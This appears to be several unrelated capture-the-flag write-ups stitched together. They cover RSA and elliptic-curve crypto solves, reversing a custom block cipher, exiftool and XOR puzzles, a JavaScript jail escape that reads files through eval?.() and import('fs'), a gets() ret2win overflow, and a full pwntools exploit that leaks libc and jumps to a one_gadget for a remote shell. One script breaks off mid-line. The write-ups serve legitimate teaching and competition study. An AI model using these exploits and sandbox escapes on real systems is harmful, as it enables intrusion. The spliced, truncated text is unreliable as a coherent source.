You have intercepted an encrypted message from the RB back to Dr. Tom!!!! The component values of Dr. Tom's public key are obviously readily available, but one of the components of his private keys was accidentally published as well! We've been eavesdropping on channels that Dr. Tom frequently uses, maybe these keys can be used to decrypt this traffic? The included files contain a message to decrypt, and the key components discussed. Developed by thatLoganGuy [publicKeys](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Jersey-CTF-IV-2024/publicKeys) [intercepted](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Jersey-CTF-IV-2024/intercepted) --- We're provided the ciphertext, n, e, and q. Simple RSA decryption -- search it up if you're a beginner. ```pyfrom Crypto.Util.number import * ct = b'w\n\xa3\xcb\xc2\xe1pjx\x867\x1cn\xc3\x9dB\x02?\xb2\x99\x8a\xb8-9;C\xa4\xb8\xfc\xc3\xca\xfe\x8e\x1e\xa1\xf5\xec[Rn&\xbb\x8b\n\xaf\x83^[P\xf9\x8c\xd5\x95~\xa7\xcb \xb0\x85Vfdu\x9d\xf5\xe4mXe\x95t\x96V\xe2\xcau\xe1\x90\x8cA/\xb1\xf3,\xa8\x04\xb9\xcf\x8fPXf\x0ffg\x8e>C\xc7\x12\xa3F\x04\x1a\t\xc2e\xdb\xc1\xf1iJ\x9e"+\x0b\x9d\xc2{\xe9\x1b\xbfN^\xb1\x14\xc3\xbfv\xeb\x90\xcd\xc7oi\xcc\x8fKQ\xdevy\x86$\x88\xca\xd6\xa9\xe3~\xd1g=ry\xf3\xcb\x85\xb7\xfa\xe1\xe0T\x8b\xcf\x18\xa0\xc3\x15\x15T\x82\xb1\xa16\xbcF\x06\xeb\x9d\xb5\xa4\x80$\x19f\x91\xb5\x8a\xe6\xe0\xf6Iu\x84\x87\xc6\xece\xf5\xfc\xd5D\xd6M\xe4knU\x06\xed\xa3\xdf^V\xc06h\xae\x9c\x89\x96V\xbe@\xf8m\xe0$\x11\x9d\xd9\xe2\xdb\x8an\xaa}\xce:\xa8C\x93\xb6O6\x07\xaf\xfb\x05\xb7}\xad\xdf\xd5%'n = 17442167786986766235508280058577595032418346865356384314588411668992021895600868350218184780194110761373508781422091305225542546224481473153630944998702906444849200685696584928947432984107850030283893610570516934680203526010120917342029004968274580529974129621496912684782372265785658930593603142665659506699243072516516137946842936290278268697077045538529685782129547539858559544839323949738223228390505139321940994534861711115670206937761214670974876911762247915864144972967596892171732288160028157304811773245287483562194767483306442774467144670636599118796333785601743172345142463479403997891622078353449239584139e = 65537q = 5287605531078312817093699647404386356924677771068464930426961333492561825516192878006123785244929191711528060728030853752820877049331817571778425287562926236019883991325417165497210118975730500175398583896121555159133806789573964069837032915266548561424490397811232957782739002112133875199p = n//qphi = (p-1)*(q-1)d = inverse(e, phi) print(long_to_bytes(pow(bytes_to_long(ct), d, n)))``` jctf{HAHAHA I knew you would intercept this transmission. You may have won this round, but there are many more challenges for me to best you at}
*For the full experience with images see the original blog post! (It contains all stages.)* Now, funny enough I already built a write gadget for the second challenge.For this one, I simply cleaned up the code a lot and fixed a few bugs where I accidentally overwrote stuff (because I didn't send null bytes in plaintext bytes I didn't specifically need).For testing, we used a Dockerfile of another challenge that Ordoviz hijacked for this challenge and I inserted some debugging: ```DockerfileFROM ubuntu:22.04@sha256:f9d633ff6640178c2d0525017174a688e2c1aef28f0a0130b26bd5554491f0da RUN apt update && apt install -y socatRUN apt-get -y install gdbserver RUN mkdir /appRUN useradd ctf COPY challenge /app/challenge USER ctf EXPOSE 1337 # CMD socat tcp-l:1337,reuseaddr,fork exec:/app/challenge,pty,echo=0,raw,iexten=0CMD [ "socat", "tcp-l:1337,reuseaddr,fork", "EXEC:'gdbserver 0.0.0.0:1234 /app/challenge',pty,echo=0,raw,iexten=0" ]``` The provided binary had some magic gadgets we found with `one_gadget`.When using a key of `'a'*16` we found a stable setup with the required registers pointing to the zero buffer on the stack after the flag.With that, we spawned a shell on the remote and got the final flag: shell on remote with cat flag ```pyfrom dataclasses import dataclassimport pwn from decrypt import PERMUTATION, decrypt_block, from_nibbles, to_nibbles @dataclassclass Block: key: str # hex string shifts: list[int] plaintext: bytes PERMUTATION_LOOKUP = [0] * 16for i in range(16): PERMUTATION_LOOKUP[PERMUTATION[i]] = i PATH = "./challenge_patched"RETURN_OFFSET = 0x58SHIFTS_OFFSET = 0x10LIBC_LEAK = 0x28 - SHIFTS_OFFSETLEAK_OFFSET = 0x62142 binary = pwn.ELF(PATH) # Currently 8 bytes only, max offset 127def build_payload(payload: bytes, offset: int): assert len(payload) == 8 assert offset <= 127 shifts = [0] * 16 shifts[0] = offset * 2 out = [0] * 16 payload_nibbles = to_nibbles(payload) for i in range(16): out[i] = payload_nibbles[PERMUTATION_LOOKUP[i]] real_payload = from_nibbles(out) return Block("a" * 16, shifts, real_payload) def send_block(conn: pwn.tube, block: Block): conn.recvuntil(b"Please provide a key for block ") conn.recvuntil(b": ") conn.sendline(block.key.encode()) for pos in range(16): conn.recvuntil(b": ") conn.sendline(hex(block.shifts[pos])[2:].encode()) conn.recvuntil(b"Please provide plaintext for block") conn.recvuntil(b": ") conn.sendline(block.plaintext.hex().encode()) def unscramble(upper, lower): if upper >= lower: return (upper - lower) << 4 | lower & 0xF else: return (0x10 + upper - lower) << 4 | lower & 0xF def reconstruct_data(read_data: bytes, key: str): shifts = [0] * 15 dec = decrypt_block(to_nibbles(bytes.fromhex(key)), shifts, to_nibbles(read_data)) fixed_data = bytes( [unscramble(dec[-2], dec[-1])] ) return fixed_data def read_byte(conn: pwn.tube, offset: int): conn.recvuntil(b"Number of blocks: ") conn.sendline(b"1") block = build_payload((offset).to_bytes(1) + b"\x00"*7, SHIFTS_OFFSET) block.key = "0"*16 send_block(conn, block) conn.recvuntil(b"Block 0: ") read_leak = conn.recvline()[:-1].decode() # print("leak:", read_leak) return reconstruct_data(bytes.fromhex(read_leak), block.key)[0] def read_bytes(conn: pwn.tube, offsets: list[int]): data = [] for off in offsets: data.append(read_byte(conn, off)) return bytes(data)[::-1] def create_conn(): if pwn.args.GDB: conn = pwn.gdb.debug(PATH, aslr=True) elif pwn.args.REMOTE: conn = pwn.remote("chal-kalmarc.tf", 8) elif pwn.args.DOCKER: conn = pwn.remote("localhost", 1337) else: conn = pwn.process(PATH) return conn def main(): with create_conn() as conn: OFFSET = 0x80 print(read_byte(conn, LIBC_LEAK+1)) leak = read_bytes(conn, [(LIBC_LEAK + o) for o in range(8)]) print(leak.hex()) libc_base = int.from_bytes(leak, 'big') - LEAK_OFFSET print(hex(libc_base)) input() conn.recvuntil(b"Number of blocks: ") conn.sendline(b"1") block = build_payload((libc_base+0xebc85).to_bytes(8, 'little'), RETURN_OFFSET) block.key = "a" * 16 send_block(conn, block) conn.interactive() pass if __name__ == "__main__": main() ``` ## Final words The challenge provided a lot of opportunities I didn't use.For example, you could of course send more than one block at a time to easily expand both read and write.Then, you could read all at once, set up ROP easily and so on.That's what I like about this challenge: It provides a lot of room for creative solutions.Try out your own ideas!
*For the full experience with images see the original blog post! (It contains all stages.)* For the first stage of the series, we get the challenge binary and text file, `data.txt`.The text file contains the parameters that were passed to the binary and the encrypted output, likely of the first flag, in python-like format.That binary is a dynamically-liked, stripped C binary in ELF 64-bit format - nothing out of the ordinary here.Since I am currently trying that out, I loaded the file into Binary Ninja to decompile it and analyze the program logic.The decompiler of your choice should produce a similar output though, the program is pretty simple. main function The main method handles IO for a custom cryptosystem, encrypting given numbers of blocks in an endless loop.Per block, the program expects an 8-byte key, 16 bytes shift and finally 8 bytes plaintext for the encryption.Additionally, it allocates 8 bytes per block for the ciphertext.All these allocated arrays are passed to the encryption function and finally the function prints the result for each block in hex encoding.While there is nothing special happening here, you may note that we got arrays of 16 values for all parameters and the ciphertext.That's a bit confusing if you expect the exact same format but we can later make a simple, educated guess as to what we actually got. do_encrypt function (func_13b9) The parameters are passed through a function that forwards it to the real encryption `func_13b9`.We will skip that one for now though and look at it later for stage 2.The encryption is a simple block cipher working in 16 rounds, one for each shift we pass in.That shift, a fix permutation and an operation I simply called `combine` (`func_1229`) are used to initialize the permutation table (called `combined_shifts` in the screenshot) for the round.Now, I don't usually play a lot of crypto challenges, so I approached the encryption from a structural standpoint. The `get_nibble` and `set_nibble` functions get and set nibbles (half-bytes) at a given index of an 8-byte array and work inverse to each other.We can calculate the permutation for each round and generate an inverse lookup table from that.If we simply want to implement the encryption logic in reverse, that leaves the `combine` function with parameters `a` and `b` in range `[0..16]`.Luckily, the mapping is unique for a given output and parameter `b` so we can precalculate that to and reverse it for our decryption.With this approach, I implemented the decryption, testing it against a python implementation of the encryption.That way, I could quickly find the small bugs I introduced (like not actually initializing the `COMBINED_LOOKUP` array) to produce the following solve script: ```py# Used as decrypt.py in other stageskeys = [ [2, 3, 3, 5, 3, 3, 1, 4, 1, 1, 3, 3, 1, 2, 2, 0], [5, 1, 5, 4, 7, 3, 2, 0, 0, 1, 7, 1, 0, 6, 2, 7], [2, 6, 6, 0, 5, 6, 5, 1, 6, 4, 7, 1, 1, 7, 3, 1], [4, 3, 0, 5, 2, 0, 4, 2, 7, 7, 7, 1, 1, 1, 7, 5], [1, 0, 0, 0, 4, 5, 3, 6, 3, 4, 7, 6, 4, 0, 1, 2], [5, 5, 7, 1, 3, 1, 7, 6, 6, 3, 1, 1, 2, 4, 6, 7], [2, 6, 2, 4, 1, 6, 0, 3, 7, 0, 6, 3, 0, 6, 7, 3],]shifts = [ [0, 1, 3, 5, 0, 1, 1, 0, 0, 1, 3, 5, 0, 1, 1, 0], [0, 1, 3, 5, 0, 1, 1, 0, 0, 1, 3, 5, 0, 1, 1, 0], [0, 1, 3, 5, 0, 1, 1, 0, 0, 1, 3, 5, 0, 1, 1, 0], [0, 1, 3, 5, 0, 1, 1, 0, 0, 1, 3, 5, 0, 1, 1, 0], [0, 1, 3, 5, 0, 1, 1, 0, 0, 1, 3, 5, 0, 1, 1, 0], [0, 1, 3, 5, 0, 1, 1, 0, 0, 1, 3, 5, 0, 1, 1, 0], [0, 1, 3, 5, 0, 1, 1, 0, 0, 1, 3, 5, 0, 1, 1, 0],]ciphertexts = [ [8, 12, 10, 7, 2, 6, 3, 2, 14, 1, 8, 4, 2, 12, 9, 15], [10, 13, 5, 2, 13, 12, 11, 5, 14, 5, 3, 12, 4, 11, 0, 9], [10, 4, 0, 3, 9, 13, 13, 2, 2, 1, 0, 4, 3, 15, 11, 12], [7, 13, 1, 13, 9, 9, 9, 10, 9, 12, 3, 0, 1, 10, 7, 12], [13, 3, 10, 6, 9, 9, 2, 13, 1, 10, 13, 0, 4, 2, 1, 0], [6, 2, 2, 2, 15, 9, 12, 4, 7, 6, 2, 15, 1, 10, 14, 7], [10, 12, 6, 14, 14, 2, 14, 12, 15, 0, 15, 0, 8, 9, 4, 2],] PERMUTATION = bytes.fromhex("090a08010e03070f0b0c02000405060d") def to_nibbles(data: bytes) -> list[int]: return [v for pos in range(len(data)) for v in [data[pos] >> 4, data[pos] & 0xF]] def from_nibbles(nibbles: list[int]) -> bytes: return bytes( [ (nibbles[2 * pos] << 4 | nibbles[2 * pos + 1]) for pos in range(len(nibbles) // 2) ] ) def combine(shift: int, other: int): other_bit = other & 1 shift_up = shift >> 1 other_up = other >> 1 if (shift & 1) != 1: out = other_bit + ((other_up + shift_up) * 2) else: diff = (((shift_up - other_up) * 2) & 0xE) - other_bit out = diff + 1 return out combine_matching = {}for s in range(2**4): for o in range(2**4): com = combine(s, o) & 0xF if (o, com) in combine_matching: print("Cannot happen!") exit(1) else: combine_matching[(o, com)] = s def reverse_combine(other: int, out: int) -> int: return combine_matching[(other, out)] def set_nibble(buffer: list[int], idx: int, val: int): buffer[idx] = val return buffer def get_nibble(buffer: list[int], idx: int) -> int: # list of 16 nibbles, higher order values first return buffer[idx] def encrypt_block( key_nibbles: list[int], shifts: list[int], plain_nibbles: list[int]) -> list[int]: out_nibbles = plain_nibbles.copy() for s in shifts: COMBINED = [0] * 16 for i in range(16): COMBINED[PERMUTATION[i]] = combine(s, i) tmp = [0] * 16 for k in range(16): plain_nibble = get_nibble(out_nibbles, k) set_nibble(tmp, COMBINED[k], plain_nibble) for k1 in range(16): key_nibble = get_nibble(key_nibbles, k1) tmp_nibble = get_nibble(tmp, k1) com = combine(tmp_nibble, key_nibble) & 0xF set_nibble(tmp, k1, com) pass for k2 in range(16): set_nibble(out_nibbles, k2, COMBINED[COMBINED[get_nibble(tmp, k2)]]) return out_nibbles def decrypt_block(key_nibbles: list[int], shifts: list[int], cipher_nibbles: list[int]): out_nibbles = cipher_nibbles.copy() for s in reversed(shifts): COMBINED = [0] * 16 for i in range(16): COMBINED[PERMUTATION[i]] = combine(s, i) COMBINED_LOOKUP = [0] * 16 for i in range(16): COMBINED_LOOKUP[COMBINED[i]] = i tmp = [0] * 16 for k2 in reversed(range(16)): val = get_nibble(out_nibbles, k2) set_nibble(tmp, k2, COMBINED_LOOKUP[COMBINED_LOOKUP[val]]) for k1 in reversed(range(16)): key_nibble = get_nibble(key_nibbles, k1) val = get_nibble(tmp, k1) uncom = reverse_combine(key_nibble, val) set_nibble(tmp, k1, uncom) for k in reversed(range(16)): val = get_nibble(tmp, COMBINED[k]) set_nibble(out_nibbles, k, val) return out_nibbles flag = b""for block in range(len(keys)): block_nibbles = decrypt_block(keys[block], shifts[block], ciphertexts[block]) block_bytes = bytes( [ ((block_nibbles[2 * pos] << 4) | block_nibbles[2 * pos + 1]) for pos in range(len(block_nibbles) // 2) ] ) flag += block_bytes print(flag)``` After the competition, it was pretty interesting for me to see the perspective of crypto players on this challenge.For example, they saw a simple Permutation-Substitution-Network and identified `func_1229` that I naively called `combine` as multiplication in D8 (the dihedral group, I think).This mix of perspectives makes the challenge really cool, in my opinion.
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script> Author : mindFlayer02 [source.sage](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/0xL4ugh-CTF-2024/source.sage) [out.txt](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/0xL4ugh-CTF-2024/out.txt) --- We are provided a sage source file and an output file. Here's the source: ```pyfrom random import * from Crypto.Util.number import * flag = b'REDACTED'#DEFINITIONK = GF(0xfffffffffffffffffffffffffffffffeffffffffffffffff);a = K(0xfffffffffffffffffffffffffffffffefffffffffffffffc);b = K(0x64210519e59c80e70fa7e9ab72243049feb8deecc146b9b1)E = EllipticCurve(K, (a, b))G = E(0x188da80eb03090f67cbf20eb43a18800f4ff0afd82ff1012, 0x07192b95ffc8da78631011ed6b24cdd573f977a11e794811) #DAMAGE def poison(val,index): val = list(val) if val[index] == '1': val[index] = '0' else: val[index] = '1' return ''.join(val) my_priv = bin(bytes_to_long(flag))[2:]ms = []C1s = []C2s = []decs = [] count = 0 while count < len(my_priv): try: k = randint(2, G.order()-2) Q = int(my_priv,2)*G M = randint(2,G.order()-2) M = E.lift_x(Integer(M));ms.append((M[0],M[1])) C1 = k*G;C1s.append((C1[0],C1[1])) C2 = M + k*Q;C2s.append((C2[0],C2[1])) ind = len(my_priv)-1-count new_priv = poison(my_priv,ind) new_priv = int(new_priv,2) dec = (C2 - (new_priv)*C1);decs.append((dec[0],dec[1])) count +=1 except: pass with open('out.txt','w') as f: f.write(f'ms={ms}\n') f.write(f'C1s={C1s}\n') f.write(f'C2s={C2s}\n') f.write(f'decs={decs}')``` This challenge looks intimidating (I was actually quite unsure at first if I could solve this), but I personally found it to be easier than I expected. Let's first go through what's happening step-by-step. First, some parameters are given, in which an elliptic curve is constructed and a generator point `G` is defined. Then, there is a `poison()` function, which seems to flip the bit at a certain position in a string. `my_priv` is set to the binary representation of the flag. We then enter a while loop, that iterates through `my_priv`. Two random integers are generated, `k` and `M`. Scalar multiplication of `G` by the integer representation of the flag produces point `Q`. Meanwhile, after looking up `lift_x()` in SageMath's documentation, I realized that it just found a y-value corresponding to the x-value of `M`. `M` thus becomes a point on the elliptic curve with the random value initially stored in `M` as its x-coordinate. Now, `C1` is produced via scalar multiplication of `k` and `G`. `C2` is produced via `M + kQ`, i.e. the scalar multiplication of `k` and `Q` and the point addition of the resultant point with `M`. `ind` seems to be controlling the index of the bit of `my_priv` we're accessing in the while loop, with the loop appearing to iterate through `my_priv` backwards. Additionally, `new_priv` is set to the result of the `poison()` function being called on `my_priv` and `ind`. If you refer back to what's happening in the `poison()` function, it seems that, in `new_priv`, the bit at position `ind` in `my_priv` will be flipped, and the rest stays the same. Notably, `my_priv` also stays the same across all iterations. The above two conclusions can easily be confirmed with some added print statements in the source file. Finally, `dec` is set to `C2 - (new_priv)*C1`. On a sidenote, it may be helpful for those of you that are not knowledgeable regarding elliptic curve cryptography to read up on it. I suggest CryptoHack as a great introduction! Reason being that you may not exactly understand what's going on with the scalar multiplication and point addition, even though you technically don't really need to. This problem comes down to a bunch of equations that actually turn out quite nicely. We can write the following: $$Q = pG$$ $$C_1 = kG$$ $$C_2 = M + kQ = M + pkG$$ $$p_m = new_priv$$ $$dec = C_2 - p_m*C1 = M + pkG - p_m*kG = M + kG(p - p_m) = M + C1(p - p_m)$$ It is known that $$p - p_m = 2^i$$ or $$p - p_m = -2^i$$ since the bit at the index changes from 0 to 1 or 1 to 0, and we change the smallest bits first and the largest bits last. Note that changing the bit from 0 to 1 would make $$p - p_m$$ negative, and changing the bit from 1 to 0 would make it positive. Therefore, based on the result of the subtraction, we know whether or not the original bit was 0 or 1. Once we know that, it is trivial to simply write a short sage script to check if the bit changed from 0 to 1 or 1 to 0. Here it is: ```pyfrom Crypto.Util.number import * # out.txt not included here for readability K = GF(0xfffffffffffffffffffffffffffffffeffffffffffffffff);a = K(0xfffffffffffffffffffffffffffffffefffffffffffffffc);b = K(0x64210519e59c80e70fa7e9ab72243049feb8deecc146b9b1)E = EllipticCurve(K, (a, b))G = E(0x188da80eb03090f67cbf20eb43a18800f4ff0afd82ff1012, 0x07192b95ffc8da78631011ed6b24cdd573f977a11e794811) binstr = ''for i in range(len(ms)): # Make each point a point on the elliptic curve M = E(ms[i]) C1 = E(C1s[i]) C2 = E(C2s[i]) dec = E(decs[i]) dec = dec - M res0 = -1 * (1<
I think i might leaked something but i dont know what Author : Bebo07 [chall2.txt](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/0xL4ugh-CTF-2024/chall2.txt) [chall2.py](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/0xL4ugh-CTF-2024/chall2.py) --- We're given a Python source file and its output. Here's the source: ```pyimport mathfrom Crypto.Util.number import *from secret import flag,p,qfrom gmpy2 import next_primem = bytes_to_long(flag.encode())n=p*q power1=getPrime(128)power2=getPrime(128)out1=pow((p+5*q),power1,n)out2=pow((2*p-3*q),power2,n)eq1 = next_prime(out1) c = pow(m,eq1,n) with open('chall2.txt', 'w') as f: f.write(f"power1={power1}\npower2={power2}\neq1={eq1}\nout2={out2}\nc={c}\nn={n}")``` For those have you that have done CryptoHack before, you may recognize that this challenge is very very similar to a CryptoHack challenge, specifically Mathematics/Modular Binomials. I immediately realized this, and went to CryptoHack to refresh my memory on the past problem and read some solutions. Note that, unless you have solved the problem, solutions may be unavailable to you. If you have solved the problem, see [here](https://cryptohack.org/challenges/bionomials/solutions/). If you haven't, I'll explain the solution anyways, so just keep reading. So, in this challenge, we are essentially provided the following equations: $$out_1=(p+5q)^{power_1}\;(mod\;n)$$ $$out_2=(2p-3q)^{power_2}\;(mod\;n)$$ Where p and q are the primes whose product is n. We of course need to find these in order to break the RSA encryption, whose ciphertext is c. Notably, however, we are not provided `out1` in our output file! Instead, we are provided `eq1`, which is the smallest prime after `eq1`. Well, before figuring out if we can solve this problem without `out1` specifically, let's first solve the case where we are given `out1`. How can we do this? As a sidenote, we are also provided the value of a variable `hint` in the output file, but this is not referenced in the source file at all. It is not necessary for the solution. Note that the following explanation is based entirely on `exp101t` Modular Binomials solution on CryptoHack, and full credit goes to him for his writeup. First, I'll rewrite the variables to make it a little easier to read. $$o_1=(p+5q)^{p_1}\;(mod\;n)$$ $$o_2=(2p-3q)^{p_2}\;(mod\;n)$$ Let's now take our equations, and raise each of them to the other's power, i.e.: $$o_1^{p_2}=(p+5q)^{p_1p_2}\;(mod\;n)$$ $$o_2^{p_1}=(2p-3q)^{p_2p_1}\;(mod\;n)$$ Because of Binomial Theorem, we know this will simplify to: $$o_1^{p_2}=(p)^{p_1p_2} + (5q)^{p_1p_2}\;(mod\;n)$$ $$o_2^{p_1}=(2p)^{p_2p_1} + (-3q)^{p_1p_2}\;(mod\;n)$$ Since all other terms have a `pq`, which is equal to `n`, in them. Let's now take both equations (mod q). Then, the q's will essentially cease to exist in our equations. Note that the (mod n) does not affect this because q is a factor of n. $$o_1^{p_2}=(p)^{p_1p_2}\;(mod\;q)$$ $$o_2^{p_1}=(2p)^{p_2p_1}\;(mod\;q)$$ Now, what if we do this: $$o_1^{p_2} \cdot 2^{p_1p_2} =(p)^{p_1p_2} \cdot 2^{p_1p_2} \;(mod\;q)$$ $$o_2^{p_1}=(2p)^{p_2p_1}\;(mod\;q)$$ Therefore: $$o_1^{p_2} \cdot 2^{p_1p_2} =(2p)^{p_1p_2}\;(mod\;q)$$ $$o_2^{p_1}=(2p)^{p_2p_1}\;(mod\;q)$$ Based on the definition of modular arithmetic, we can then write: $$o_1^{p_2} \cdot 2^{p_1p_2} =(2p)^{p_1p_2} + k_1q$$ $$o_2^{p_1}=(2p)^{p_2p_1} + k_2q$$ And thus, $$x = o_1^{p_2} \cdot 2^{p_1p_2} - o_2^{p_1} = (2p)^{p_1p_2} + k_1q - ((2p)^{p_2p_1} + k_2q) = (k_1 - k_2)q$$ Hence, we have now produced a number that is a multiple of q. And thus `gcd(x, n)` will return q. Perfect. So now we know how to factor n if we did know `out_1`. But unfortunately, we don't. We only the know the smallest prime greater than it. So how we can do this? I immediately thought of brute forcing `out_1` by just sequentially checking numbers less than `eq1` until we find an `out_1` that works. But what if the distance is really large? What if the next prime after `out_1` was millions away? I decided to quickly test this out by just looking for the next prime after `eq1`. This would tell me if the prime density was large enough for brute forcing to work. ```pyfrom Crypto.Util.number import * eq1=2215046782468309450936082777612424211412337114444319825829990136530150023421973276679233466961721799435832008176351257758211795258104410574651506816371525399470106295329892650116954910145110061394115128594706653901546850341101164907898346828022518433436756708015867100484886064022613201281974922516001003812543875124931017296069171534425347946706516721158931976668856772032986107756096884279339277577522744896393586820406756687660577611656150151320563864609280700993052969723348256651525099282363827609407754245152456057637748180188320357373038585979521690892103252278817084504770389439547939576161027195745675950581for i in range(10000): if isPrime(eq1): print(eq1) break eq1 += 1``` Turns out the next prime number was less than 10000 away! 10000 is already easily brute forceable. We can quickly write a script to now brute force `out1`. ```pyx1 = pow(2, power1*power2, n)x2 = pow(out2, power1, n)for i in range(10000): # if i % 100 == 0: print(i) diff = abs(pow(eq1, power2, n)*x1 - x2) q = gcd(diff, n) if q > 1: # print(g) break eq1 -= 1 if is_prime(eq1): break``` After this, once we have q, we can simply do standard RSA procedure and decrypt the message. Here is my full implementation: ```pyfrom gmpy2 import next_prime, gcd, is_primefrom Crypto.Util.number import * power1=281633240040397659252345654576211057861power2=176308336928924352184372543940536917109hint=411eq1=2215046782468309450936082777612424211412337114444319825829990136530150023421973276679233466961721799435832008176351257758211795258104410574651506816371525399470106295329892650116954910145110061394115128594706653901546850341101164907898346828022518433436756708015867100484886064022613201281974922516001003812543875124931017296069171534425347946706516721158931976668856772032986107756096884279339277577522744896393586820406756687660577611656150151320563864609280700993052969723348256651525099282363827609407754245152456057637748180188320357373038585979521690892103252278817084504770389439547939576161027195745675950581out2=224716457567805571457452109314840584938194777933567695025383598737742953385932774494061722186466488058963292298731548262946252467708201178039920036687466838646578780171659412046424661511424885847858605733166167243266967519888832320006319574592040964724166606818031851868781293898640006645588451478651078888573257764059329308290191330600751437003945959195015039080555651110109402824088914942521092411739845889504681057496784722485112900862556479793984461508688747584333779913379205326096741063817431486115062002833764884691478125957020515087151797715139500054071639511693796733701302441791646733348130465995741750305c=11590329449898382355259097288126297723330518724423158499663195432429148659629360772046004567610391586374248766268949395442626129829280485822846914892742999919200424494797999357420039284200041554727864577173539470903740570358887403929574729181050580051531054419822604967970652657582680503568450858145445133903843997167785099694035636639751563864456765279184903793606195210085887908261552418052046078949269345060242959548584449958223195825915868527413527818920779142424249900048576415289642381588131825356703220549540141172856377628272697983038659289548768939062762166728868090528927622873912001462022092096509127650036n=14478207897963700838626231927254146456438092099321018357600633229947985294943471593095346392445363289100367665921624202726871181236619222731528254291046753377214521099844204178495251951493800962582981218384073953742392905995080971992691440003270383672514914405392107063745075388073134658615835329573872949946915357348899005066190003231102036536377065461296855755685790186655198033248021908662540544378202344400991059576331593290430353385561730605371820149402732270319368867098328023646016284500105286746932167888156663308664771634423721001257809156324013490651392177956201509967182496047787358208600006325742127976151e = eq1 x1 = pow(2, power1*power2, n)x2 = pow(out2, power1, n)for i in range(10000): # if i % 100 == 0: print(i) diff = abs(pow(eq1, power2, n)*x1 - x2) q = gcd(diff, n) if q > 1: # print(g) break eq1 -= 1 if is_prime(eq1): break p = n//qassert p*q == nphi = (p - 1)*(q - 1)# d = inverse(e, n)d = pow(e, -1, phi)print(long_to_bytes(pow(c, d, n)))``` Run the script for the flag! 0xL4ugh{you_know_how_factor_N!}
## Beginner/Beginner-menace We have this image ![friend](https://github.com/zer00d4y/writeups/assets/128820441/4a154e7c-0c5b-41ff-bdfb-58e6d88635d8) It's very easy and simple, just check meta data with exiftool or other exif tools `exiftool friend.jpeg` ┌──(kali㉿kali)-[~/Downloads] └─$ exiftool friend.jpeg ExifTool Version Number : 12.67 File Name : friend.jpeg Directory : . File Size : 6.5 kB File Modification Date/Time : 2023:12:15 09:26:43-05:00 File Access Date/Time : 2023:12:20 05:09:27-05:00 File Inode Change Date/Time : 2023:12:20 05:09:27-05:00 File Permissions : -rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Exif Byte Order : Big-endian (Motorola, MM) X Resolution : 1 Y Resolution : 1 Resolution Unit : None Artist : flag{7h3_r34l_ctf_15_7h3_fr13nd5_w3_m4k3_al0ng} Y Cb Cr Positioning : Centered Image Width : 266 Image Height : 190 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 266x190 Megapixels : 0.051 FLAG: `flag{7h3_r34l_ctf_15_7h3_fr13nd5_w3_m4k3_al0ng}`
I have encrypted some text but it seems I have lost the key! Can you find it? [yors-truly.py](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Wolv-CTF-2024/beginner/yors-truly.py) --- <script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script> We're provided a Python source file: ```pyimport base64 plaintext = "A string of text can be encrypted by applying the bitwise XOR operator to every character using a given key"key = "" # I have lost the key! def byte_xor(ba1, ba2): return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)]) ciphertext_b64 = base64.b64encode(byte_xor(key.encode(), plaintext.encode())) ciphertext_decoded = base64.b64decode("NkMHEgkxXjV/BlN/ElUKMVZQEzFtGzpsVTgGDw==") print(ciphertext_decoded)``` Note that XOR is a reversible operation, since `a ^ a = 0` and XOR is associative and commutative. Therefore, to recover the key, it we can simply XOR the plaintet and the ciphertext. See below: $$plaintext=pt$$ $$ciphertext=ct$$ $$ct=pt \oplus key$$ $$ct \oplus pt = pt \oplus key \oplus pt = key$$ Therefore, here is the solve script: ```pyimport base64 plaintext = "A string of text can be encrypted by applying the bitwise XOR operator to every character using a given key"key = "" # I have lost the key! def byte_xor(ba1, ba2): return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)]) ciphertext_b64 = base64.b64encode(byte_xor(key.encode(), plaintext.encode())) ciphertext_decoded = base64.b64decode("NkMHEgkxXjV/BlN/ElUKMVZQEzFtGzpsVTgGDw==") print(byte_xor(plaintext.encode(), ciphertext_decoded))``` Run the script to get the flag! wctf{X0R_i5_f0rEv3r_My_L0Ve}
The service greeted us with an invitation to insert one line of JS code. The problem was that the "jail" prohibited any function calls. Searching for JS constructs that may not be perceived as function calls, but can still help to get access to function calls I found```eval?.()``` The further code built itself:```eval?.(`import('fs').then(async (fs) => { console.log(await fs.promises.readFile('/home/ctfuser/app/flag', 'utf-8')); })`);``` ![](https://i.ibb.co/4tGfRpq/image.png) uoftctf{b4by_j4v4scr1p7_gr3w_up_4nd_b3c4m3_4_h4ck3r}
A harder babypwn. `nc babypwn2.wolvctf.io 1337 ` [babypwn2](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Wolv-CTF-2024/beginner/babypwn2) [babypwn2.c](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Wolv-CTF-2024/beginner/babypwn2.c) --- We're provided a binary ELF and a C source file. Here's the source: ```c#include <stdio.h>#include <unistd.h> /* ignore this function */void ignore(){ setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0);} void get_flag() { char *args[] = {"/bin/cat", "flag.txt", NULL}; execve(args[0], args, NULL);} int main() { ignore(); char buf[0x20]; printf("What's your name?\n>> "); gets(buf); printf("Hi %s!\n", buf); return 0;}``` Basically, the vulnerability here lies in the call to the `gets()` function in main(). gets() is well-known to be vulnerable, as it places no protections on buffer overflow/sending in too many bytes as input. Essentially, this is a classic ret2win challenge. For those of you unaware what this means, ret2win entails overriding the RIP, i.e. the return pointer. Basicaly, the RIP is located on the stack, and, at the end of main(), when the proram hits a `return` statement, the program will return to the location specified by RIP. However, because the RIP is located on the stack, attackers can override this value. We want to override the RIP with the return address of get_flag() so the program returns to get_flag() instead! To do this, we can easily use pwntools. 